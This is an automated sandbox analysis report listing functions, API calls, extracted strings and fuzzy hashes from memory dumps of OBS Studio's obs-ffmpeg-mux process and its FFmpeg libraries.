Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _aligned_free$strcmp$strchrstrtol
String ID: channels$%d channels (%[^)]$ambisonic $mono
API String ID: 6235670-221731140
Opcode ID: 9a9eb1e0a00dde1935faf8ff688298a0d262cbf1e4cfcb0e70de2c1dca8238e4
Instruction ID: dd7f250768444454186d89ac61579f48fbfe10d6e3e5ae0eb274f322c802c856
Opcode Fuzzy Hash: 9a9eb1e0a00dde1935faf8ff688298a0d262cbf1e4cfcb0e70de2c1dca8238e4
Instruction Fuzzy Hash: A84281B3A0E682A5EB648F15E45037E67A1FB84BC0F549035DA8D47B95EF3CE442EB40

Function 00007FF8BFB58DB0 Relevance: 42.1, APIs: 12, Strings: 12, Instructions: 108COMMON

Download Yara Rule

APIs

av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB58DFE
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58E1B
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58E38
av_opt_set_chlayout.AVUTIL-58 ref: 00007FF8BFB58E5A
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58E7C
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58E9E
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58EBB
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58ED0
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58EE5
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58EFA
av_opt_set_int.AVUTIL-58 ref: 00007FF8BFB58F0F
av_log.AVUTIL-58 ref: 00007FF8BFB58F53

Strings

isf, xrefs: 00007FF8BFB58E72
och, xrefs: 00007FF8BFB58F08
Failed to set option, xrefs: 00007FF8BFB58F40
ochl, xrefs: 00007FF8BFB58DE7
uch, xrefs: 00007FF8BFB58EB1
icl, xrefs: 00007FF8BFB58EC9
isr, xrefs: 00007FF8BFB58E94
ichl, xrefs: 00007FF8BFB58E50
osr, xrefs: 00007FF8BFB58E2E
ocl, xrefs: 00007FF8BFB58EDE
osf, xrefs: 00007FF8BFB58E11
ich, xrefs: 00007FF8BFB58EF3

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_opt_set_int$av_opt_set_chlayout$av_log
String ID: Failed to set option$ich$ichl$icl$isf$isr$och$ochl$ocl$osf$osr$uch
API String ID: 4144258317-3247528414
Opcode ID: 10ab7c08c9e10468c087a0fc18b47031af3b6046317781463100eb67561eeeb0
Instruction ID: d73a74d02a417476c71cdee5adff2657d8965f814a9c05578b1518452dfbfec0
Opcode Fuzzy Hash: 10ab7c08c9e10468c087a0fc18b47031af3b6046317781463100eb67561eeeb0
Instruction Fuzzy Hash: 92417CA5B0825361FB60A7E9A962BB7B751EF983C8F805432EF4C47A55EE3CE0048700

Function 00007FF8A7C12D90 Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 203COMMON

Download Yara Rule

APIs

_read.MSVCRT ref: 00007FF8A7C12E0D
_close.MSVCRT ref: 00007FF8A7C12E17
_read.MSVCRT ref: 00007FF8A7C12E48
_close.MSVCRT ref: 00007FF8A7C12E52
clock.MSVCRT ref: 00007FF8A7C12EF9

Strings

/dev/random, xrefs: 00007FF8A7C12E27
Microsoft Primitive Provider, xrefs: 00007FF8A7C12DA0
N, xrefs: 00007FF8A7C13087
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C13080
sizeof(tmp) >= av_sha_size, xrefs: 00007FF8A7C13070
/dev/urandom, xrefs: 00007FF8A7C12DEC
src/libavutil/random_seed.c, xrefs: 00007FF8A7C13069
RNG, xrefs: 00007FF8A7C12DA7

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _close_read$clock
String ID: /dev/random$/dev/urandom$Assertion %s failed at %s:%d$Microsoft Primitive Provider$N$RNG$sizeof(tmp) >= av_sha_size$src/libavutil/random_seed.c
API String ID: 3077350862-4220122895
Opcode ID: 42a263d787bb1900c231adad2bae4144787def7db549a8d8b5a27e8b710399cc
Instruction ID: 5b264a2885ead62009a104311b3ed1d1a18f94d4a3427b79cba916c723a0ecf5
Opcode Fuzzy Hash: 42a263d787bb1900c231adad2bae4144787def7db549a8d8b5a27e8b710399cc
Instruction Fuzzy Hash: B3714472B1A642B6FB289F24E5412BD3791EF883C0F50413AEA0E87A95FE7CE544D740

Function 00007FF8A7C0F2C0 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 461COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FF8A7C0F94F
_errno.MSVCRT ref: 00007FF8A7C0F977

Strings

%Y - %m - %d, xrefs: 00007FF8A7C0F62C
%H:%M, xrefs: 00007FF8A7C0F57A
%J:%M:%S, xrefs: 00007FF8A7C0F331
%M:%S, xrefs: 00007FF8A7C0F923
%H:%M:%S, xrefs: 00007FF8A7C0F68E
%H%M%S, xrefs: 00007FF8A7C0F6A9
%Y%m%d, xrefs: 00007FF8A7C0F64D
+, xrefs: 00007FF8A7C0F5A4
now, xrefs: 00007FF8A7C0F613
AliceBlue, xrefs: 00007FF8A7C0F5CD

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: _errno
String ID: %H%M%S$%H:%M$%H:%M:%S$%J:%M:%S$%M:%S$%Y - %m - %d$%Y%m%d$+$AliceBlue$now
API String ID: 2918714741-785088730
Opcode ID: 8cc4219109180221a37125365c6cb82e6481bf229ae85591e8e1ba171042397c
Instruction ID: 023dcfb832c837fcaf75593f9498608f31d8b714759b83d530eb52f5d54a6419
Opcode Fuzzy Hash: 8cc4219109180221a37125365c6cb82e6481bf229ae85591e8e1ba171042397c
Instruction Fuzzy Hash: F0025832B1E69666FB20CF25E44033EAB91EB817C4F548131DA4D07BE5DE3DE546AB40

Function 00007FF8A7BED9B0 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 272COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7BED9FF

Strings

av_crc_init(av_crc_table[AV_CRC_32_IEEE], 0, 32, 0x04C11DB7, sizeof(av_crc_table[AV_CRC_32_IEEE])) >= 0, xrefs: 00007FF8A7BEDBBB
src/libavutil/crc.c, xrefs: 00007FF8A7BED9D4, 00007FF8A7BEDA34, 00007FF8A7BEDA94, 00007FF8A7BEDAF4, 00007FF8A7BEDB54, 00007FF8A7BEDBB4
av_crc_init(av_crc_table[AV_CRC_24_IEEE], 0, 24, 0x864CFB, sizeof(av_crc_table[AV_CRC_24_IEEE])) >= 0, xrefs: 00007FF8A7BEDB5B
av_crc_init(av_crc_table[AV_CRC_16_CCITT], 0, 16, 0x1021, sizeof(av_crc_table[AV_CRC_16_CCITT])) >= 0, xrefs: 00007FF8A7BEDAFB
av_crc_init(av_crc_table[AV_CRC_8_ATM], 0, 8, 0x07, sizeof(av_crc_table[AV_CRC_8_ATM])) >= 0, xrefs: 00007FF8A7BED9DB, 00007FF8A7BEDA3B, 00007FF8A7BEDA9B
Assertion %s failed at %s:%d, xrefs: 00007FF8A7BED9EB, 00007FF8A7BEDA4B, 00007FF8A7BEDAAB, 00007FF8A7BEDB0B, 00007FF8A7BEDB6B, 00007FF8A7BEDBCB

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: abort
String ID: Assertion %s failed at %s:%d$av_crc_init(av_crc_table[AV_CRC_16_CCITT], 0, 16, 0x1021, sizeof(av_crc_table[AV_CRC_16_CCITT])) >= 0$av_crc_init(av_crc_table[AV_CRC_24_IEEE], 0, 24, 0x864CFB, sizeof(av_crc_table[AV_CRC_24_IEEE])) >= 0$av_crc_init(av_crc_table[AV_CRC_32_IEEE], 0, 32, 0x04C11DB7, sizeof(av_crc_table[AV_CRC_32_IEEE])) >= 0$av_crc_init(av_crc_table[AV_CRC_8_ATM], 0, 8, 0x07, sizeof(av_crc_table[AV_CRC_8_ATM])) >= 0$src/libavutil/crc.c
API String ID: 4206212132-2611614167
Opcode ID: 92c9e43b5e3701d523069e98b3d843c3635d7b65042acc036af35ff1e6a13f27
Instruction ID: 384b9b1fc25ef92d2baf52cb86a0ec3ec77c49445e36ec991a77acde93fbcbea
Opcode Fuzzy Hash: 92c9e43b5e3701d523069e98b3d843c3635d7b65042acc036af35ff1e6a13f27
Instruction Fuzzy Hash: 35A1C4B3F1AA4697E7009F64D8817ED36A1EB84784FC48236D60DC6792EE7CE146E700

Function 00007FF8A7BFED32 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 176libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A7BFED8A

Strings

d3d11_1sdklayers.dll, xrefs: 00007FF8A7BFED80
dxgidebug.dll, xrefs: 00007FF8A7BFEF50
Failed to create Direct3D device (%lx), xrefs: 00007FF8A7BFF02D
Using device %04x:%04x (%ls)., xrefs: 00007FF8A7BFEEEF
DXGIGetDebugInterface, xrefs: 00007FF8A7BFEF65
debug, xrefs: 00007FF8A7BFED66
Failed to load D3D11 library or its functions, xrefs: 00007FF8A7BFF00B

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: LibraryLoad
String ID: DXGIGetDebugInterface$Failed to create Direct3D device (%lx)$Failed to load D3D11 library or its functions$Using device %04x:%04x (%ls).$d3d11_1sdklayers.dll$debug$dxgidebug.dll
API String ID: 1029625771-4247103231
Opcode ID: 5e2a214d2a33974e5b6e87ebf4458333bd18d13c46bc31c7c438c065be5d4816
Instruction ID: 754694359c03af3db5957a0d1a1ee1c91ac9b0c3ca8e862af9a9dd0b9c168158
Opcode Fuzzy Hash: 5e2a214d2a33974e5b6e87ebf4458333bd18d13c46bc31c7c438c065be5d4816
Instruction Fuzzy Hash: D2712872B0AB42A2EB508F29E45077E67A0FB84BC8F545132DA8D47BA4DF7DE405E740

Function 00007FF8A7C0C650 Relevance: 16.8, APIs: 1, Strings: 10, Instructions: 299COMMON

Download Yara Rule

Strings

all, xrefs: 00007FF8A7C0C7FE
Unable to parse option value "%s", xrefs: 00007FF8A7C0CBAE
The "%s" option is deprecated: %s, xrefs: 00007FF8A7C0CABE
%d%*1[:/]%d%c, xrefs: 00007FF8A7C0CB60
none, xrefs: 00007FF8A7C0C7EF
-, xrefs: 00007FF8A7C0CA63
max, xrefs: 00007FF8A7C0C7C9
const_values array too small for %s, xrefs: 00007FF8A7C0CB8A
default, xrefs: 00007FF8A7C0C784
min, xrefs: 00007FF8A7C0C7E0

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: %d%*1[:/]%d%c$-$The "%s" option is deprecated: %s$Unable to parse option value "%s"$all$const_values array too small for %s$default$max$min$none
API String ID: 0-679463259
Opcode ID: 9d9d9a3b7a0190a60b3e1d7de4052083c20cc3d048e1b11ee78faf5db607be51
Instruction ID: c80c2f163aeb0cd4c6e9ce6e8bed67ae332b1277f5193ae624fd2461f147be78
Opcode Fuzzy Hash: 9d9d9a3b7a0190a60b3e1d7de4052083c20cc3d048e1b11ee78faf5db607be51
Instruction Fuzzy Hash: 72E1BF33A0AB8296E7718F14E4407AFB3A4FB85788F144232EA8D57684DF3CD146EB40

Function 00007FF8BFB568B0 Relevance: 16.3, APIs: 6, Strings: 3, Instructions: 567COMMON

Download Yara Rule

APIs

av_malloc_array.AVUTIL-58 ref: 00007FF8BFB56976
av_malloc_array.AVUTIL-58 ref: 00007FF8BFB5698B

Strings

src/libswresample/resample.c, xrefs: 00007FF8BFB56CEA, 00007FF8BFB573D2
tap_count == 1 || tap_count % 2 == 0, xrefs: 00007FF8BFB573E1
Assertion %s failed at %s:%d, xrefs: 00007FF8BFB56D05

Memory Dump Source

Source File: 0000000B.00000002.2302138105.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true

Associated: 0000000B.00000002.2302114617.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302162368.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302187686.00007FF8BFB72000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302211955.00007FF8BFB73000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302229128.00007FF8BFB76000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000B.00000002.2302247937.00007FF8BFB77000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfb50000_obs-ffmpeg-mux.jbxd

Similarity

API ID: av_malloc_array
String ID: Assertion %s failed at %s:%d$src/libswresample/resample.c$tap_count == 1 || tap_count % 2 == 0
API String ID: 1862890220-3187375394
Opcode ID: 821feb5264397491c723a34886a4805e0f008ad312c9caf0883d02201ff3be8e
Instruction ID: f13741d8450be293af949bc2605954e4a0c26aa1dba8a58a84938fd3e7cbd5e7
Opcode Fuzzy Hash: 821feb5264397491c723a34886a4805e0f008ad312c9caf0883d02201ff3be8e
Instruction Fuzzy Hash: B4427472D28F8549D6238B78986127AB725FF963C4F51D337EA4E36A55DF2CF0828600

Function 00007FF8A7C04C80 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 398COMMON

Download Yara Rule

Strings

8, xrefs: 00007FF8A7C0529D
Last message repeated %d times, xrefs: 00007FF8A7C052F6
?, xrefs: 00007FF8A7C050A8
Last message repeated %d times, xrefs: 00007FF8A7C04FA2
[%s] , xrefs: 00007FF8A7C05316
%s%s%s%s, xrefs: 00007FF8A7C04F2A
[%s @ %p] , xrefs: 00007FF8A7C04DCB, 00007FF8A7C04E42

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID:
String ID: Last message repeated %d times$ Last message repeated %d times$%s%s%s%s$8$?$[%s @ %p] $[%s]
API String ID: 0-179686365
Opcode ID: ce54885c60954f378c52401b716c70c516f3c7c7a1fae476ce4e39e9d3599150
Instruction ID: fad14397280f9dde9b396e99692d554faa40dc3792357ecd9b7182a5d22c2709
Opcode Fuzzy Hash: ce54885c60954f378c52401b716c70c516f3c7c7a1fae476ce4e39e9d3599150
Instruction Fuzzy Hash: 78F10572A0E68666FB609F11A4407BE67A1FF867C4F444036DE8D07386DE3DE586E780

Function 00007FF8A7C024D0 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 442COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF8A7C0262A
abort.MSVCRT ref: 00007FF8A7C026EF
memcpy.MSVCRT ref: 00007FF8A7C02A6B

Strings

src/libavutil/imgutils.c, xrefs: 00007FF8A7C026C4
ret >= 0, xrefs: 00007FF8A7C026CB
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C026DB

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301933703.00007FF8A7CA6000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302000469.00007FF8A7DE3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302031438.00007FF8A7DE8000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DE9000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302054409.00007FF8A7DEC000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2302092471.00007FF8A7DED000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8a7be0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: memcpy$abort
String ID: Assertion %s failed at %s:%d$ret >= 0$src/libavutil/imgutils.c
API String ID: 3629556515-2504023021
Opcode ID: 2312a6da2723e7e0594906141bd6e79322ef9e88a15247b0ee1471fd6e159ad7
Instruction ID: f07b4b2a32143b835280aac53789c967370e0ea3137e189913812e930e378d81
Opcode Fuzzy Hash: 2312a6da2723e7e0594906141bd6e79322ef9e88a15247b0ee1471fd6e159ad7
Instruction Fuzzy Hash: FE02DE36A0968196EB60CF15E4403AEB7A0FB897C4F544135DE8E93B98EF3DE446DB40

Function 00007FF8BFBA6CBC Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF8BFBA6CD8
memset.VCRUNTIME140 ref: 00007FF8BFBA6CFC
RtlCaptureContext.KERNEL32 ref: 00007FF8BFBA6D05
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF8BFBA6D1F
RtlVirtualUnwind.KERNEL32 ref: 00007FF8BFBA6D60
memset.VCRUNTIME140 ref: 00007FF8BFBA6D93
IsDebuggerPresent.KERNEL32 ref: 00007FF8BFBA6DB4
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF8BFBA6DD5
UnhandledExceptionFilter.KERNEL32 ref: 00007FF8BFBA6DE0

Memory Dump Source

Source File: 0000000B.00000002.2302427408.00007FF8BFBA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFBA0000, based on PE: true

Associated: 0000000B.00000002.2302403121.00007FF8BFBA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302459532.00007FF8BFBA8000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000000B.00000002.2302518486.00007FF8BFBAC000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff8bfba0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 13250969f5b2de30470bf22d6d750f243ba906d20c34ed2405166bb0a67cfad5
Instruction ID: 917ab1229e92aac6c67d73f9844038c5f1eecc0bcd7001cc73b1debfb2aaaab9
Opcode Fuzzy Hash: 13250969f5b2de30470bf22d6d750f243ba906d20c34ed2405166bb0a67cfad5
Instruction Fuzzy Hash: FC313E72609B8186EB609FA4E8507ED7361FB88784F44443ADB8E47B98EF3CD558C710

Function 00007FF649AA3C5C Relevance: 13.6, APIs: 9, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF649AA3C78
memset.VCRUNTIME140 ref: 00007FF649AA3C9C
RtlCaptureContext.KERNEL32 ref: 00007FF649AA3CA5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF649AA3CBF
RtlVirtualUnwind.KERNEL32 ref: 00007FF649AA3D00
memset.VCRUNTIME140 ref: 00007FF649AA3D33
IsDebuggerPresent.KERNEL32 ref: 00007FF649AA3D54
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF649AA3D75
UnhandledExceptionFilter.KERNEL32 ref: 00007FF649AA3D80

Memory Dump Source

Source File: 0000000B.00000002.2291350522.00007FF649AA1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF649AA0000, based on PE: true

Associated: 0000000B.00000002.2291251062.00007FF649AA0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291384389.00007FF649AA5000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291442922.00007FF649AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2291474165.00007FF649AA9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff649aa0000_obs-ffmpeg-mux.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 313767242-0
Opcode ID: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
Instruction ID: ce93afce913a38b716c41117b740df0d069eb52a290576f141386147eef3872b
Opcode Fuzzy Hash: 8e29f9cfb3282d508510f87b074f2afb23630758b427b43b81c2847ae2e7d6a0
Instruction Fuzzy Hash: CB312D7264DB818BEB60AF60E8503EE7360FB85744F444439DA4E87A94DF3CD588C724

Function 00007FF8A7C05980 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 408COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00007FF8A7C059AF

Strings

src/libavutil/lzo.c, xrefs: 00007FF8A7C05984
[, xrefs: 00007FF8A7C059A2
cnt >= 0, xrefs: 00007FF8A7C0598F
?, xrefs: 00007FF8A7C05A39
Assertion %s failed at %s:%d, xrefs: 00007FF8A7C05996

Memory Dump Source

Source File: 0000000B.00000002.2301834894.00007FF8A7BE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A7BE0000, based on PE: true

Associated: 0000000B.00000002.2301810828.00007FF8A7BE0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2301913345.00007FF8A7CA5000.00000008.00000001.01000000.00000009.sdmpDownload File
